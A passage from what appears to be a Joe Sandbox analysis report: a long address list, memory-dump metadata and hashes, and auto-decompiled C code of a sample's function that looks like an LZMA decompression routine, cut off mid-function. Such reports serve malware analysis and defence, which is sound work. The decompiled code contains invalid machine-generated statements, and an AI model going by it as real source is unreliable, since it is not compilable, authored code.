                                                                                                                                                                                                                            0x004074dc
                                                                                                                                                                                                                            0x004074df
                                                                                                                                                                                                                            0x004074e2
                                                                                                                                                                                                                            0x004074e5
                                                                                                                                                                                                                            0x004074e8
                                                                                                                                                                                                                            0x004074eb
                                                                                                                                                                                                                            0x004074ee
                                                                                                                                                                                                                            0x00407507
                                                                                                                                                                                                                            0x0040750a
                                                                                                                                                                                                                            0x0040750d
                                                                                                                                                                                                                            0x00407510
                                                                                                                                                                                                                            0x00407514
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407517
                                                                                                                                                                                                                            0x0040751a
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f8
                                                                                                                                                                                                                            0x004074fd
                                                                                                                                                                                                                            0x004074ff
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x0040751d
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c5
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x00407331
                                                                                                                                                                                                                            0x00407333
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x0040733c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407346
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x004071c9
                                                                                                                                                                                                                            0x004071cb
                                                                                                                                                                                                                            0x004071cd
                                                                                                                                                                                                                            0x004071d0
                                                                                                                                                                                                                            0x004071d1
                                                                                                                                                                                                                            0x004071d3
                                                                                                                                                                                                                            0x004071d5
                                                                                                                                                                                                                            0x004071d8
                                                                                                                                                                                                                            0x004071db
                                                                                                                                                                                                                            0x004071f1
                                                                                                                                                                                                                            0x004071f6
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x00407232
                                                                                                                                                                                                                            0x0040725e
                                                                                                                                                                                                                            0x00407260
                                                                                                                                                                                                                            0x00407267
                                                                                                                                                                                                                            0x0040726a
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407274
                                                                                                                                                                                                                            0x00407277
                                                                                                                                                                                                                            0x0040727e
                                                                                                                                                                                                                            0x00407281
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072b1
                                                                                                                                                                                                                            0x004072b4
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x004072b6
                                                                                                                                                                                                                            0x004072bc
                                                                                                                                                                                                                            0x004072bf
                                                                                                                                                                                                                            0x004072c2
                                                                                                                                                                                                                            0x004072c5
                                                                                                                                                                                                                            0x004072c8
                                                                                                                                                                                                                            0x004072cb
                                                                                                                                                                                                                            0x004072ce
                                                                                                                                                                                                                            0x004072d1
                                                                                                                                                                                                                            0x004072d4
                                                                                                                                                                                                                            0x004072d7
                                                                                                                                                                                                                            0x004072f0
                                                                                                                                                                                                                            0x004072f2
                                                                                                                                                                                                                            0x004072f5
                                                                                                                                                                                                                            0x004072f6
                                                                                                                                                                                                                            0x004072f9
                                                                                                                                                                                                                            0x004072fb
                                                                                                                                                                                                                            0x004072fe
                                                                                                                                                                                                                            0x00407300
                                                                                                                                                                                                                            0x00407302
                                                                                                                                                                                                                            0x00407305
                                                                                                                                                                                                                            0x00407307
                                                                                                                                                                                                                            0x0040730a
                                                                                                                                                                                                                            0x0040730e
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407311
                                                                                                                                                                                                                            0x00407314
                                                                                                                                                                                                                            0x00407317
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072e1
                                                                                                                                                                                                                            0x004072e6
                                                                                                                                                                                                                            0x004072e8
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x0040731a
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x00407234
                                                                                                                                                                                                                            0x00407237
                                                                                                                                                                                                                            0x00407239
                                                                                                                                                                                                                            0x0040723c
                                                                                                                                                                                                                            0x0040723f
                                                                                                                                                                                                                            0x00407242
                                                                                                                                                                                                                            0x00407244
                                                                                                                                                                                                                            0x00407247
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x00407250
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x004071dd
                                                                                                                                                                                                                            0x004071e0
                                                                                                                                                                                                                            0x004071e2
                                                                                                                                                                                                                            0x004071e5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f44
                                                                                                                                                                                                                            0x00406f44
                                                                                                                                                                                                                            0x00406f48
                                                                                                                                                                                                                            0x0040758d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040758d
                                                                                                                                                                                                                            0x00406f4e
                                                                                                                                                                                                                            0x00406f51
                                                                                                                                                                                                                            0x00406f54
                                                                                                                                                                                                                            0x00406f57
                                                                                                                                                                                                                            0x00406f5a
                                                                                                                                                                                                                            0x00406f5d
                                                                                                                                                                                                                            0x00406f60
                                                                                                                                                                                                                            0x00406f62
                                                                                                                                                                                                                            0x00406f65
                                                                                                                                                                                                                            0x00406f68
                                                                                                                                                                                                                            0x00406f6b
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x00407350
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407356
                                                                                                                                                                                                                            0x00407359
                                                                                                                                                                                                                            0x0040735c
                                                                                                                                                                                                                            0x0040735f
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407364
                                                                                                                                                                                                                            0x00407367
                                                                                                                                                                                                                            0x0040736a
                                                                                                                                                                                                                            0x0040736d
                                                                                                                                                                                                                            0x00407370
                                                                                                                                                                                                                            0x00407373
                                                                                                                                                                                                                            0x00407374
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407379
                                                                                                                                                                                                                            0x0040737c
                                                                                                                                                                                                                            0x0040737f
                                                                                                                                                                                                                            0x00407382
                                                                                                                                                                                                                            0x00407385
                                                                                                                                                                                                                            0x00407389
                                                                                                                                                                                                                            0x0040738b
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                                                                                                                                                            • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00406BB0 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E00406BB0(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
